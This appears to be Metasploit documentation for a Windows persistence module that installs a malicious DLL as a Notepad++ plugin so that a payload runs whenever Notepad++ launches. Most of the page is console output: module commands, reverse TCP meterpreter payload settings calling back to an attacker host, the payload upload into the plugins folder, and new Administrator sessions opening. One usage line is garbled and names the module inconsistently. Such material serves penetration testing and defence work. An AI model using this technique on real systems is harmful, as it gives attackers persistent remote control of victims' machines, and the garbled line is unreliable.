documentation/modules/exploit/windows/persistence/notepadpp_plugin.md
This module create persistence by adding a malicious plugin to Notepad++, as it blindly loads and executes DLL from its plugin directory on startup,meaning that the payload will be executed every time Notepad++ is launched.
The payload will have same privileges as user executing Notepad++.
use exploit/windows/persistence/notepad++_persistence set session #runName of the payload file. Defaults to <random>.dll
Original shell
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
LHOST => wg0
LPORT => 4242
[*] Started reverse TCP handler on 192.168.3.7:4242
[*] Meterpreter session 1 opened (192.168.3.7:4242 -> 10.5.134.148:49988) at 2025-11-12 16:24:53 +0100
meterpreter > getuid
Server username: WIN10_2004_8D28\Administrator
meterpreter > sysinfo
Computer : WIN10_2004_8D28
OS : Windows 10 2004 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
Persistence
msf exploit(multi/handler) > use exploit/windows/persistence/notepadpp_plugin_persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/notepadpp_plugin_persistence) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/notepadpp_plugin_persistence) > set session 1
session => 1
msf exploit(windows/persistence/notepadpp_plugin_persistence) > run verbose=true
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/notepadpp_plugin_persistence) > [*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Notepad++ present and plugin folder is writable
[+] Writing payload to C:\Program Files\Notepad++\plugins\JzHPoxkI\
[*] Payload (9216 bytes) uploaded on WIN10_2004_8D28 to C:\Program Files\Notepad++\plugins\JzHPoxkI\
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/WIN10_2004_8D28_20251112.2704/WIN10_2004_8D28_20251112.2704.rc
[*] Sending stage (230982 bytes) to 10.5.134.148
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.134.148:50011) at 2025-11-12 16:27:19 +0100
msf exploit(windows/persistence/notepadpp_plugin_persistence) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN10_2004_8D28\Administrator @ WIN10_2004_8 192.168.3.7:4242 -> 10.5.134.148:49988 (10.5.
D28 134.148)
2 meterpreter x64/windows WIN10_2004_8D28\Administrator @ WIN10_2004_8 192.168.3.7:4444 -> 10.5.134.148:50011 (10.5.
D28 134.148)
msf exploit(windows/persistence/notepadpp_plugin_persistence) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : WIN10_2004_8D28
OS : Windows 10 2004 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN10_2004_8D28\Administrator